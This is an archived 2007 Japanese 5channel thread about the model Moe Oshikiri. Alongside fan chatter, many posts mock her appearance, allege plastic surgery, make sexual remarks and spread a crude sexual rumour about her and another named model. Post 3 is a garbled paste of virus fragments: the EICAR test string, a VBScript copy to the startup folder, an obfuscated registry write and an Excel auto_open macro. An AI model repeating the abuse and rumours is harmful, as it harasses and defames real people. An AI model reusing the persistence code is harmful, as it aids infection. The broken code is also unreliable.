5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【AneCanモデル】押切もえ12【CanCam,popteen出身】

1 :無名モデル:2007/08/29(水) 02:25:19 ID:???
押切もえオフィシャルホームページ
ttp://www.jap.co.jp/oshikiri_moe/

(前スレ)
【CanCamモデル】押切もえ11【popteen出身】
http://life8.2ch.net/test/read.cgi/model/1176912202/

荒し、煽りは徹底放置!反応したあなたも荒らしです。
sage進行推奨。
アンチや整形の話がしたい人は↓のスレへどうぞ。
押切もえって激しくブスじゃね?
http://life8.2ch.net/test/read.cgi/model/1184165363/ 

2 :無名モデル:2007/08/29(水) 02:31:23 ID:jDtSnq4G
スレ立て乙。
2ゲットキタ━━━━(゚∀゚)━━━━!!!

3 :無名モデル:2007/08/29(水) 02:39:10 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


4 :無名モデル:2007/08/29(水) 15:45:52 ID:0vV+BnrP

押切もえ マイケルジャクソン化計画

5 :無名モデル:2007/08/29(水) 16:15:28 ID:CQbMMiPt
元々好きな顔じゃないけど、整形前の顔を見たら更に嫌いになった。押切もえを昔から好きって人は許容範囲が相当広いね。

6 :無名モデル:2007/08/29(水) 16:47:29 ID:???
http://vista.crap.jp/img/vi8836772976.jpg

7 :無名モデル:2007/08/29(水) 17:21:40 ID:5gp8wp1s

押切が太ると http://vista.crap.jp/img/vi8836772976.jpg になるのか。

8 :イトキン:2007/08/29(水) 17:29:20 ID:f38a0Wvg
これおもしろい!!
http://crew.vc/

9 :無名モデル:2007/08/30(木) 01:03:33 ID:???
もえちゃん今日もかわいくてありがとう(* ^ー゚)
オモ☆さん見る為に、家にBSデジタル導入したお(`・ω・´)

10 :無名モデル:2007/08/30(木) 04:37:59 ID:???
僕は今度のチューボーですよを保存しようと思ってDVDレコーダー買ったお

11 :無名モデル:2007/08/30(木) 09:38:46 ID:???
しゃべり方がキモくてバカ丸出し。読モ時代は暴言吐きまくりだったのに人格まで偽装ワロスw

12 :無名モデル:2007/08/30(木) 20:30:56 ID:???
気持ち悪い顔
老け過ぎ

13 :無名モデル:2007/08/31(金) 00:05:24 ID:i8IZ6aWA

目玉ホラーみたい。

顔はシワシワ。

14 :無名モデル:2007/08/31(金) 01:08:34 ID:???
http://imepita.jp/20070831/036090
http://imepita.jp/20070831/036340
http://imepita.jp/20070831/036590

誰だか分からない

15 :無名モデル:2007/08/31(金) 01:34:52 ID:wuiTZXZq

改造済み

http://ameblo.jp/user_images/7f/da/10001980559_s.jpg
http://image.blog.livedoor.jp/wanigiriwassyoi/imgs/9/f/9f35e961.jpg

16 :無名モデル:2007/08/31(金) 15:43:47 ID:rsJyfP67
【8.23 オモ☆さん収録前スペシャル】
http://vision.ameba.jp/watch.do?movie=561986

17 :無名モデル:2007/09/01(土) 02:25:34 ID:7oHcae0+
yuri?
オマエ、自分で短期間に掲示板へ二度も撮影者募集を
出してミウ以下だな。ww

http://bbs3.meiwasuisan.com/bbs/owarai/img/11880100230001.jpg  > Yuri

いかに世間から論外視されているかが分かるだろ?
悟ったらサッサと消えろや。
貴様のBOOK撮りに付き合う暇人はJPにもいないだろう。
撮影会にでもいって小銭稼いでこいよ
ハッキリ言って邪魔、再登録もすごい迷惑。
JPの中で輝ろうなんぞ浅はかな考えは捨て職安にでもいけ!
http://www.topmodel.jp/


18 :無名モデル:2007/09/01(土) 16:55:31 ID:???
今日はチューボーですよを見るお

19 :無名モデル:2007/09/01(土) 23:10:30 ID:???
もえタン!!こんばんは(^-^)/

ぼくイギルスにりゅう学してたんだ!(*^-^)b

もえタンのブリッジが楽しみ!o(^-^)o

20 :無名モデル:2007/09/02(日) 00:01:12 ID:???
最近、某大手外語学校でフランス語始めてる。
・・・世界進出を狙ってるんじゃあ・・・・・。

21 :無名モデル:2007/09/02(日) 00:06:51 ID:???
もえタン!!ブリッジ見たよ!(^O^)/

もえタンのブリッジわたりたいな!(*^-^)b

もえすみなさい(ρ_-)o

22 :無名モデル:2007/09/02(日) 00:08:10 ID:???
ブリッジ録画した人いない?うp頼む

23 :無名モデル:2007/09/02(日) 00:20:17 ID:???
拾い画像
http://vista.jeez.jp/img/vi8865998242.jpg

24 :無名モデル:2007/09/02(日) 00:22:51 ID:???
ムシじゃねぇかよwww
キモチワリィ

25 :無名モデル:2007/09/02(日) 01:14:31 ID:???
>>19>>21
ありえないくらいキモくて寒気がするレスだorz

26 :無名モデル:2007/09/02(日) 01:18:39 ID:???
>>19>>21
もえすみキタ━━━━(゚∀゚)━━━━!!!!

27 :無名モデル:2007/09/02(日) 01:30:13 ID:???
>>20大手外国語学校ってどこ?

28 :無名モデル:2007/09/02(日) 02:11:05 ID:???
>>23
動画みたいんだが、誰も録画してないか・・・
本当にするんですか?って照れ方が可愛かったんだが

29 :無名モデル:2007/09/02(日) 02:22:31 ID:???
料理してるもえちゃん可愛すぎるお( ^∀^)
もえちゃんは家庭的なとこも(・∀・)イイネ!!

30 :無名モデル:2007/09/02(日) 02:53:00 ID:7ZNQllE4
>>29
・・・・・・・・


31 :無名モデル:2007/09/02(日) 03:25:56 ID:Ke+Hky8Q
>>29はとにかくキモすぎるお( ^∀^)
もえちゃんは人工的なとこが(・∀・)キモイネ!!

32 :無名モデル:2007/09/02(日) 05:10:44 ID:2l4fGSbN
チューボーで好きな男性のタイプ二宮君って言ってたよね!?嵐の二宮だよね?

33 :無名モデル:2007/09/02(日) 07:54:48 ID:???
あんなに大股広げてブリッジしちゃうなんて、イケナイ子だね…
でも、ブリッジした後にすぐに手を洗ったのはさすが
俺のもえちゃんだね!


34 :無名モデル:2007/09/02(日) 08:39:05 ID:???
>>32
二宮金次郎じゃないの? 読書好きだし

35 :無名モデル:2007/09/02(日) 10:24:42 ID:zlGjdIAA
チューボーですよのもえたん‥かわゆすだったぁ(∀)

36 :無名モデル:2007/09/02(日) 10:36:28 ID:???
金次郎LOVE押切

37 :無名モデル:2007/09/02(日) 10:55:30 ID:Bqw58dzW
     _  -───-   _
            ,  '´           `ヽ
          /                 \
        /                    ヽ
      / __, ィ_,-ァ__,, ,,、  , 、,,__ -ァ-=彡ヘ  ヽ
       ' 「      ´ {ハi′          }  l
      |  |                    |  |
       |  !                        |  |
      | │                   〈   !
      | |/ノ二__‐──ァ   ヽニニ二二二ヾ } ,'⌒ヽ
     /⌒!|  =彳o。ト ̄ヽ     '´ !o_シ`ヾ | i/ ヽ !    ウホッ! いい男・・・
     ! ハ!|  ー─ '  i  !    `'   '' "   ||ヽ l |
    | | /ヽ!        |            |ヽ i !
    ヽ {  |           !           |ノ  /
     ヽ  |        _   ,、            ! , ′
      \ !         '-゙ ‐ ゙        レ'
        `!                    /
        ヽ     ゙  ̄   ̄ `     / |
            |\      ー ─‐       , ′ !
           |  \             /   |
      _ -‐┤ ゙、 \           /  ! l  |`ーr─-  _
 _ -‐ '"   / |  ゙、   ヽ ____  '´   '│  !  |     ゙''‐- 、,_



38 :無名モデル:2007/09/02(日) 11:00:26 ID:???
もえタン!!おはよう(^O^)/

え い ご で しゃ べ ら な い か (*^-^)b

39 :無名モデル:2007/09/02(日) 11:22:39 ID:Bqw58dzW
    〃                 i,        ,. -‐
   r'   ィ=ゝー-、-、、r=‐ヮォ.〈    /
    !  :l      ,リ|}    |. }   /   .や
.   {.   |          ′    | }    l
    レ-、{∠ニ'==ァ   、==ニゞ<    |    ら
    !∩|.}. '"旬゙`   ./''旬 ` f^|    |
   l(( ゙′` ̄'"   f::` ̄  |l.|   |     な
.    ヽ.ヽ        {:.    lリ     |
.    }.iーi       ^ r'    ,'    ノ    い
     !| ヽ.   ー===-   /    ⌒ヽ
.   /}   \    ー‐   ,イ       l    か
 __/ ‖  .  ヽ、_!__/:::|\       ヽ


40 :無名モデル:2007/09/02(日) 16:29:27 ID:???
妖怪しわしわ

41 :無名モデル:2007/09/03(月) 00:53:04 ID:???
>>27
ベル●ッツだよ。英語かと思いきや、仏語の先生と部屋にいるところを見た。

42 :無名モデル:2007/09/03(月) 11:11:08 ID:???
整形してなかったら、CanCamのモデルや今の地位はなかった。
だから、良かったんじゃね?
egg時代は、まじデブスで小汚い。
当時はそれでも人気あった…謎。

43 :無名モデル:2007/09/03(月) 12:45:28 ID:n177hZAq
、        ヽ
 |ヽ ト、  ト、 ト、 、.`、
/|l. l. | |l l | | l |l.| |l. l
/' j/ ノ|ル'/レ〃j/l |
-‐7" ヾー---┐|_.j
 ̄   ./゙ニ,ニF、'' l _ヽ
::   ,.,. |ヽ 」9L.` K }.|
    l'  """  l ) /
  h、,.ヘ.      レ'/
          レ′
 r.二二.)     /  
  ≡≡    ,イ
.       / !
\   /  ├、
::::::` ̄´   /  !ハ.


44 :無名モデル:2007/09/03(月) 12:46:33 ID:???
http://bbs2.meiwasuisan.com/bbs/humor/img/11887911020001.jpg

芸術だな。




45 :無名モデル:2007/09/03(月) 16:27:45 ID:???
整形してブスから妖怪になった

46 :無名モデル:2007/09/03(月) 19:22:09 ID:3bqzaAQs
明日アメスタでいつもの収録
http://messages.yahoo.co.jp/bbs?.mm=TV&action=m&board=1834607&tid=a1ya1ya1ya1za5a2a5aa59a5bfa1db86bdia5a2a5aa5va5mjfcaw6i&sid=1834607&mid=31

47 :無名モデル:2007/09/03(月) 21:31:30 ID:???
今夜は英語でしゃべらナイトの放送日ですよ

48 :sage:2007/09/03(月) 23:14:52 ID:QcXcYvVU
バカ丸出し

49 :無名モデル:2007/09/03(月) 23:49:02 ID:???
DQN押切

50 :無名モデル:2007/09/04(火) 00:32:50 ID:YNZwZpGs

婆切妖怪

51 :無名モデル:2007/09/04(火) 17:37:50 ID:???
目元がキモイ
メークのページには出ないで

52 :無名モデル:2007/09/04(火) 19:26:56 ID:P2n2Nc+i
押切ギョロメ

53 :無名モデル:2007/09/04(火) 23:32:11 ID:Tdr7rY0i

婆切出目金

54 :無名モデル:2007/09/05(水) 01:14:38 ID:wwLA3/OI
押切もえの脳の中は「悩みと愛と欲」
http://news.ameba.jp/entertainment/

55 :無名モデル:2007/09/05(水) 12:42:54 ID:f+aj2mJF
顔面偽装はもはや詐欺。
しかしこれですら整形後だから救いようがない不細工。
http://imepita.jp/20070905/454630

56 :無名モデル:2007/09/05(水) 15:00:26 ID:???
「ブスじゃね?スレ」に書き込もうと思ったら本家も同じじゃんw
やっぱりいいと思ってるのは本人と関係者ぐらいなんだな
いや、厳密には本人だけか・・・
もういいかげんテレビはおろしてやれよ 見ていて痛々しいからさ

57 :無名モデル:2007/09/05(水) 16:26:19 ID:cmZl5TFj
『身長さえあればどうにでもなる』っていういい手本だよね

58 :無名モデル:2007/09/05(水) 17:27:51 ID:???
とにかく顔がキモイ!!!

59 :無名モデル:2007/09/06(木) 00:14:35 ID:EbKFC0PL
今日も動画に挑戦☆
http://vision.ameba.jp/watch.do;jsessionid=2211AC518285067A5A18A8349D0B741B?movie=567134

60 :無名モデル:2007/09/06(木) 00:39:34 ID:???
↑間違えてますがw

http://vision.ameba.jp/watch.do?movie=567134

61 :無名モデル:2007/09/06(木) 16:27:10 ID:???
きもさん

62 :無名モデル:2007/09/06(木) 17:19:38 ID:YYUsn2W3
>>60
しゃべり方がわざとらしい
これにもがっかり↓
http://imepita.jp/20070906/620810
http://imepita.jp/20070906/621040
http://imepita.jp/20070906/621380

63 :無名モデル:2007/09/06(木) 23:14:34 ID:kJoswtvM
このひと、ピーターみたいな顔になる瞬間がある。
お、おとこ!?

64 :無名モデル:2007/09/06(木) 23:25:03 ID:???
ミニスカートから伸びる美脚は絶品ですな。エビちゃんにも負けないくらいです。
芸能界でも屈指の美脚ですね。後は杉本有美ちゃんか菊川怜ちゃんくらしか思いつかないです。

おいら足フェチなんでこの人がテレビにでると絶対みますね。NHKの英会話にも見てます。
先週は外資系企業を訪ねるんですけど赤い洋服と美脚があいまってそれはそれは眼福でした。


65 :無名モデル:2007/09/07(金) 01:03:58 ID:???
何の魅力も無い
むしろ眼の毒

66 :無名モデル:2007/09/08(土) 01:10:38 ID:???
いんぽ

67 :無名モデル:2007/09/08(土) 04:37:54 ID:???
64
エロ爺シネ
クズザコ
人造人間がそんなに好きかww

68 :無名モデル:2007/09/08(土) 19:15:40 ID:???
改造人間にしても魅力なさ杉だ

69 :無名モデル:2007/09/08(土) 20:53:51 ID:???
で、AneCanは売れてるの??

70 :無名モデル:2007/09/08(土) 21:18:45 ID:???
昔は悲惨
http://imepita.jp/20070908/762720
http://imepita.jp/20070908/762930

71 :無名モデル:2007/09/08(土) 22:15:16 ID:???
今も十分悲惨な件

72 :無名モデル:2007/09/08(土) 23:28:25 ID:iSV0PzK8
そして恐らく将来も悲惨

73 :無名モデル:2007/09/09(日) 12:14:37 ID:0ybquNCU
ayu(浜崎あゆみ)ファンの海外アーティスト(知っている限り。追加よろしく)

アヴリル・ラヴィーン、トムヨーク、ビリージョエル、バーナードサムナー
SUM41、GREEN DAY、U2ボノ、THE MUSIC、エアロスミス、RED HOT CHILI PEPPERS
シェリルクロウ、アイオナ、Evanescence、リンキン・パーク、マルーン5
、Ne-Yo、ゼブラヘッド、マイ・ケミカル・ロマンス、オアシス、アンダーワールド
ケミカル・ブラザーズ、ファットボーイ・スリム、システムF、ポール・ヴァン・ダイク
ペット・ショップ・ボーイズ、ヒラリー・ダフ、デズリーなど他多数。

残念だけど存在もカリスマ性もすべてayuがナンバーワンだよ。
今中高生に「歌姫って言ったら?」って質問したらみんなayuって言うよ。
ayuのファン層は本当広い。

74 :無名モデル:2007/09/09(日) 14:09:12 ID:PpifHoFZ
なぜ、婆切のスレで浜崎?

75 :無名モデル:2007/09/09(日) 14:13:31 ID:???
(ρ_-)o
http://imepita.jp/20070909/511440

76 :無名モデル:2007/09/09(日) 16:42:06 ID:???
もういいかげんモデルに専念させた方がいい
視聴者のためにも本人のためにもね

77 :無名モデル:2007/09/09(日) 16:49:48 ID:???
anecan卒業してくれ

78 :無名モデル:2007/09/09(日) 20:02:43 ID:???
もういい加減消えた方がいい
世の中のためにね

79 :無名モデル:2007/09/09(日) 21:32:48 ID:???
で、AneCanは売れてるの??

80 :無名モデル:2007/09/10(月) 00:36:32 ID:???
http://movie-navi.net/otakara/other/200705/2007.05.11oshigirimoe.jpg


81 :無名モデル:2007/09/10(月) 09:02:01 ID:5cMxg8AD
買ったよ 姉

82 :無名モデル:2007/09/10(月) 15:46:06 ID:o8TsHhNt
婆切はもうテレビ画面に出ないで下さい。
活動は雑誌の中だけにして下さい。
婆切の顔を見ると気分悪くなります。

83 :無名モデル:2007/09/10(月) 23:17:54 ID:EDzmBm2B
汗×濡れティッシュ=やりずらい【9.06 オモ☆さん収録前SP】
http://vision.ameba.jp/watch.do?movie=571939

84 :無名モデル:2007/09/11(火) 00:05:27 ID:???
昔はともかく、今はとても可愛いじゃないか。
今の顔をめちゃくちゃ悪く言う人って、なんか恨みでも
あんじゃね?
HISだって、海老と並んでてももえちゃんの方が可愛い。

85 :無名モデル:2007/09/11(火) 01:27:54 ID:+TxS/LU2
押し切りドスコイマンコしょんべん臭そう

86 :無名モデル:2007/09/11(火) 01:33:00 ID:???
>>84
それは決してない。エビちゃんは可愛いし美人だが押切は整形を繰り返したせいでもはやグロい。

egg時代から知る人ならばキャラ偽装のひどさにドン引き間違いなし。

87 :無名モデル:2007/09/11(火) 11:18:15 ID:???
元ブスでもここまで可愛くなって売れっ子になれる希望の光を
見せてくれたもえちゃん。
可愛くなって自然と性格も可愛くなるって事もあるんじゃない? 
格好変えただけで気持ちも変わる様に。
確かに二重の幅が広いのは気になるが、それにしても可愛い事は
間違いないと思うけど・・・?

88 :無名モデル:2007/09/11(火) 21:17:15 ID:???
間違いなく可愛くないと思うんですが

89 :無名モデル:2007/09/11(火) 22:47:21 ID:???
>>84
エビよりかわいいってwww
変わった審美眼をお持ちですねw

90 :無名モデル:2007/09/12(水) 01:58:44 ID:???
頼むからこれ見よがしにカメラ目線で私かわいいでしょ光線アピールスマイルをしないで欲しい。
正直嘔吐を伴います
オェ

91 :無名モデル:2007/09/13(木) 06:00:00 ID:???
顔もキャラも全て偽装
http://geino.seikei.boo.jp/?eid=378655

http://geino.seikei.boo.jp/?eid=492234

92 :無名モデル:2007/09/13(木) 12:33:51 ID:bXhJOZsx
作り物過ぎてキモイです。
ウザイのでテレビに出ないで下さい。

93 :無名モデル:2007/09/14(金) 20:53:57 ID:???
害人

94 :無名モデル:2007/09/15(土) 09:19:22 ID:???
小島よしおの笑顔とソックリだなぁ。
見てて背筋が凍ったよ。

95 :無名モデル:2007/09/15(土) 10:39:00 ID:???
小島よしおに失礼だ!

96 :無名モデル:2007/09/16(日) 05:36:23 ID:8eb6Fl39
【9.06 オモ☆さん収録前SP】
http://vision.ameba.jp/watch.do?movie=576811

97 :無名モデル:2007/09/16(日) 16:05:13 ID:???
藤井悠と仲いいなんて意外だ

98 :無名モデル:2007/09/17(月) 09:45:40 ID:DpxgyXHH
もえちゃんが好きって人に会ったことない
エビちゃんマキちゃんはなんといっても女受けがいいし、優ちゃん直子ちゃんは男受けがいいし
もえちゃんの支持層てどのあたり?

99 :無名モデル:2007/09/17(月) 10:05:39 ID:Y8GAx/t8
もえちゃん可愛いから好き
整形だろーが何だろーが関係ない

100 :無名モデル:2007/09/17(月) 10:09:48 ID:???
全然可愛くないし気持ち悪いだけ
あの作ったキャラクターで何処へ行く気か

101 :無名モデル:2007/09/17(月) 11:45:12 ID:???
http://up2.viploader.net/upphp/src/vlphp069198.jpg

102 :並木朗:2007/09/17(月) 13:09:46 ID:XoNfOKso
早くもえちゃんのモテスト爪先舐めさせろや

103 :無名モデル:2007/09/17(月) 18:49:22 ID:???
これだけ嫌われてる
雑誌のメインモデルっていないと思うw

104 :無名モデル:2007/09/17(月) 18:50:03 ID:???
藤井悠&もえちんコンビはヤリマ○で有名じゃん (笑)

105 :無名モデル:2007/09/17(月) 19:19:58 ID:???
藤井は素行が残念だ
もえよりルックスは段違いで良いのに

106 :無名モデル:2007/09/22(土) 00:48:50 ID:???
もえちゃん可愛いよ(・∀・)
AneCanは毎月かかさず買ってるし
これからも応援するよ〜♪

107 :無名モデル:2007/09/22(土) 03:32:53 ID:ZjhnDcqV
今日も動画です〃
http://vision.ameba.jp/watch.do?movie=583641

108 :無名モデル:2007/09/22(土) 04:32:28 ID:???
もはやファンが入り込めないほどのアンチの数だ('V`)

109 :無名モデル:2007/09/22(土) 07:47:14 ID:tftRvoNI
>>98 エビマキは女受けいいかもだけど、基本的にエビマキが好きな女性って頭が弱いか、菩薩みたいにやさしい人が多い。もえのファンも、性別で言ったら圧倒的に女性が多い。

110 :無名モデル:2007/09/23(日) 17:46:38 ID:???
>>109
意味不明www

111 :無名モデル:2007/09/23(日) 22:53:04 ID:AF4F5lZE
え、そんな言語能力じゃ日常生活こまるだろう? 

112 :無名モデル:2007/09/24(月) 00:20:53 ID:???
とりあえず>>109
えびもえまきは女受けがいいってことを言いたかったんじゃね?www

113 :無名モデル:2007/09/24(月) 02:50:35 ID:???
もえちゃん好きな男の子も多いはずだよ!
友達にAneCan見せてあげたら、ほとんどみんな
もえちゃんのことを可愛いって言ってた( ^∀^)

114 :無名モデル:2007/09/24(月) 06:25:03 ID:YrAnsK36
押切もえは神だと思っている。

一ヶ月ほど前の仕事休みに両親と都内のラーメン屋に 食べに行った時の話。
両親と3人でテーブルを囲んで食事をしているといきなり、もえちゃんが玄関から入ってきた。
ラーメン屋に似合わないお洒落ないでたちで。

もえちゃんが「だりぃー。私いつもの〜」と言って二階へ上がろうとすると、 店内にいた高校生集団が「もえさん!」「もえちゃんかわいいー!」
などと騒ぎ出し、もえが戻ってきたのだが、もえちゃんは「おめーら、うるせーぞ!!」と一喝。
店内に13、5人ほど居合わせた客全員がシーンとなった。 そして、もえちゃんは、黙々と汗をかきながら、鼻息すさまじく一人ラーメンを食べ、ゲップをしながら二階に上がっていった。
私と両親は、もえちゃんの愛想の悪さと言葉遣いの悪さに興奮しつつ食事を終え、会計を済ませようとレジに向かうと、店員さんが階段の上を指差しながら 「今日のお客さんの分はもえが出してくれましたから。また来てくださいね」と。

あれには本当にびっくりした。クーーール!!!!!!!!!!


115 :無名モデル:2007/09/24(月) 06:32:54 ID:???
やだ。
真剣に読んじゃったじゃない

116 :無名モデル:2007/09/24(月) 07:48:57 ID:eKCwiJrb
朝から笑わせないでwwww

117 :無名モデル:2007/09/24(月) 09:11:36 ID:wdsDZC9+
同じこと、カエラはもんじゃ屋でしたみたいだけどw

118 :無名モデル:2007/09/24(月) 17:34:15 ID:???
もえちゃん嫌いな男の子も多いはずだよ!
友達にAneCan見せてあげたら、ほとんどみんな
もえちゃんのことをキモいって言ってた( ^∀^)



119 :無名モデル:2007/09/24(月) 20:15:18 ID:???
みなさ〜ん
今日はしゃべらナイトですよ〜

120 :無名モデル:2007/09/24(月) 20:21:56 ID:LFdlLO00
もえのことキライだっていう男は多分、古典的な「男」にあげられるいくつかのオーソドックスなイメージに近い男だ。デリカシーがなく、小汚く、単純でバカで性欲が強い。しかし、そういう男は母性を擽る。

121 :無名モデル:2007/09/25(火) 01:31:29 ID:FsYVahuq
>>120
ひどいねw

俺の周りも、もえの人気は皆無というか、きもがられている。



122 :無名モデル:2007/09/25(火) 14:30:29 ID:???
えびちゃんはかわいいけど、もえは…
っていう人がほとんどじゃない?

123 :無名モデル:2007/09/25(火) 20:24:51 ID:pWaaXwfg
押切もえは友情に厚そうな顔してる

124 :無名モデル:2007/09/25(火) 23:36:37 ID:???
ブリッコ気持ち悪い

125 :無名モデル:2007/09/26(水) 11:38:37 ID:VfG1rT6D
>>122 私もそれです。押切を見ると同時に過去のプロレスラー顔だった押切も浮かんできます。

126 :無名モデル:2007/09/26(水) 12:33:22 ID:fUgRxFtW
鳥ガラみたいですね…
お尻に痣出来てそう
痛くないのかなあ

127 :無名モデル:2007/09/26(水) 16:43:48 ID:???
目が窪んで見えるしイボもあるし
40過ぎに見える

128 :無名モデル:2007/09/27(木) 01:42:27 ID:???
痩せて鳥ガラになる奴は普通未満。
普通以上のやつをモデルにつかってほしい、と普通に言いたい。

129 :無名モデル:2007/09/27(木) 08:16:18 ID:???
>>128
> 痩せて鳥ガラになる奴は普通未満。
それって、イーエムアイとかいう綴りの奴のことか?

130 :無名モデル:2007/09/28(金) 00:29:05 ID:???
もえタン!!こんばんは(^-^)/

ぼくオビラジ見てるよ!(*^-^)b

今夜は眠れないよ!o(^-^)o

131 :無名モデル:2007/09/28(金) 00:33:46 ID:???
もえちゃん大好き(〃▽〃)

132 :無名モデル:2007/09/28(金) 00:55:49 ID:???
もえタン!!(^O^)/

こんやはビンゴナイトだね!o(^-^)o

まえはとちゅうで終わっちゃったから
今夜は楽しみにしてるよ!(*^-^)b

もえすみなさい(ρ_-)o

133 :無名モデル:2007/09/28(金) 22:00:14 ID:6c7OFrak
顔があれなのにかわいこぶるから、
ますますキモいんだよねw


134 :無名モデル:2007/09/28(金) 22:14:24 ID:???
今度こそ当てるお(・∀・)
もえちゃんに名前を呼んで貰いたいな(* ^ー゚)

135 :無名モデル:2007/09/28(金) 22:59:06 ID:???
もえちゃん大好きだお

136 :無名モデル:2007/09/29(土) 00:59:50 ID:YdCawc5B
大江アナブログ
http://www.tv-tokyo.co.jp/contents/adomachi/ooe/

10月からひとつナレーションが増えることになりました。
土曜日の11時30分から放送する「LOVE GOLF」
清水圭さんと滝沢沙織さんが、毎回ゲストを迎えて
楽しくラウンドする番組です。

番組丸ごとのナレーションをする機会がなかなかなかったので
とてもワクワクです!
番組1回目のゲストはモデルの押切もえさん。
ナレーション原稿の山に目を回しながらも、
押切さんの映像に癒される。。。そんなナレーション収録でした。

137 :無名モデル:2007/09/29(土) 01:36:22 ID:WJyuAkpm
もう最高
http://www.youtube.com/watch?v=EF2PU674cI8


138 :無名モデル:2007/09/29(土) 03:10:10 ID:???
もえタン!!こんばんは!(^-^)/

ビンゴ当たらなかったよ(-.-;)

だけどね、もえタンが見れたからまん族だよ!(*^-^)b

もえすみなさい(ρ_-)o

139 :無名モデル:2007/09/29(土) 03:22:16 ID:???
>>138
どうしてブログに同じことを書けない

いくじなし
ひゃたれ
インキン

140 :無名モデル:2007/09/29(土) 04:53:12 ID:???
インキンオブジョイトイ

141 :無名モデル:2007/09/29(土) 19:18:38 ID:???
もえちゃんはEカップなのか
おっぱい大きい

142 :無名モデル:2007/09/29(土) 23:14:35 ID:???
中身はなんだろーねー

143 :無名モデル:2007/09/30(日) 16:51:11 ID:???
おっぱいハァハァ

144 :無名モデル:2007/10/01(月) 00:08:20 ID:oiDjMcxd
>>141 嘘だね。

145 :無名モデル:2007/10/01(月) 19:11:33 ID:???
化け物押切キモイんだよ

146 :無名モデル:2007/10/01(月) 20:45:38 ID:???
髪の毛の分け目(大体、左眉頭上)
眉の形(左曲線・右直線気味)
鼻の角度(目の下から極端に高くなる)
口周りの皺(曲線が同じ)
声質(見ての通り)
話し方(受け身の時の対応)

ttp://www.yourfilehost.com/media.php?cat=video&file=a070309.wmv

今も変わっていない。

147 :無名モデル:2007/10/02(火) 02:51:34 ID:???
しぐさといい話し方といい女らしくてかわいいよね、もえちゃん
沢尻とはえらいちがい

148 :無名モデル:2007/10/02(火) 02:56:46 ID:???
>>147
沢尻と比べること自体が失礼

149 :無名モデル:2007/10/02(火) 04:29:41 ID:???
もえホルダー欲しいお

150 :無名モデル:2007/10/02(火) 14:16:42 ID:czGW27xC
>>147 >>148
 
なにこの自演wwww

151 :無名モデル:2007/10/02(火) 17:59:21 ID:???
>>148 沢尻エリカかわいいもんね

152 :無名モデル:2007/10/02(火) 19:33:36 ID:qa8rfXQ5
>>146
これ、もえなの?

153 :無名モデル:2007/10/02(火) 20:19:38 ID:xA9uj31C
なんかどっちだか判らんw

154 :無名モデル:2007/10/03(水) 13:54:46 ID:Hcp2Mvvw
Hello?♪
http://vision.ameba.jp/watch.do?movie=596578

155 :無名モデル:2007/10/03(水) 14:38:57 ID:???
気持ち悪いし大っ嫌い!!
早くAneからいなくなりますように

156 :無名モデル:2007/10/03(水) 15:47:22 ID:2Sk7lik8
沢尻のがマシ
押切みたいに芸能界に残るための必死なキャラ作りのが痛いわ〜

157 :無名モデル:2007/10/03(水) 16:00:38 ID:Biq3lTqI
整形して別人なのに名前も変えずに出て来るなんて、根性あるね。それともただのバカ?

158 :無名モデル:2007/10/03(水) 16:09:02 ID:???
>>156
客の前であんな態度をとるバカがマシって

お前頭狂ってるぞww

159 :無名モデル:2007/10/03(水) 19:06:00 ID:6nsVTBLa
もえちゃん可愛いよ〜 あのきれいな脚舐めたい
あーもえちゃんとやりてー

160 :無名モデル:2007/10/03(水) 20:34:53 ID:???
↑何その書き込み ふざけてるんですか?

161 :無名モデル:2007/10/03(水) 20:47:47 ID:6nsVTBLa
ふざけてないよ

162 :無名モデル:2007/10/04(木) 00:21:20 ID:5n8bjk77
ブログ、一緒に写ってるヘアメイクさん(男)が前にいるわりに顔小さい。
顔だけ写すよりも、脚が見える全体写した方がいいね。

163 :無名モデル:2007/10/04(木) 03:14:06 ID:???
なんかもえちゃんのスレがたってるけど
ここって何チャン?

164 :無名モデル:2007/10/04(木) 07:21:06 ID:TCRUchX0
もえちゃんマジ可愛いよ〜

165 :無名モデル:2007/10/04(木) 20:19:23 ID:???
>>163
朝日さん乙。
ここは2ちゃんですよ!

166 :無名モデル:2007/10/05(金) 07:18:59 ID:???
>>157
そりゃーそうでしょ
偏差値30代の高卒(しかも1年留年してるし)
エビちゃんの方が賢いじゃない?

167 :無名モデル:2007/10/05(金) 12:55:40 ID:JteXoyWW
>>166 高校卒業して某大学(6大学中の1校)入ったんだよね?
雑誌で、名前の脇に「○○大学」って書いてあったし。
それは詐称なの?

168 :無名モデル:2007/10/05(金) 15:13:46 ID:???
>>167
今は早稲田なんてAOで芸能人やモデルとりまくってるからね…
だから本当に入れたかもしれないけど授業もなにもかもついていけないのが現実だと思う
ただ、ここまでスタイルがいいのは羨ましい

169 :無名モデル:2007/10/05(金) 23:01:44 ID:j0nkY2Wj
明日って何かあるの?

170 :無名モデル:2007/10/05(金) 23:30:28 ID:4gDnbomv
>>169
テレビ東京 11:30〜 LOVE×GOLF「TV(秘)初公開!押切もえ」
[司]清水圭 [司]滝沢沙織 

この新番組に出るみたいですよ

171 :無名モデル:2007/10/06(土) 14:11:42 ID:tRUgQzhD
Anecan最高!もえさいこー!
Anecan情報!
p40,99,102,218,228,230,237,246,274,276,321−333の
もえUp、超抜ける。
他のモデルと比べるとそのエロさは格別。
いくら外野が騒いだって無理なの!
AnecanはMoecanなんだから。
あと巻末にのりかの抜けるUpもあり(^^)

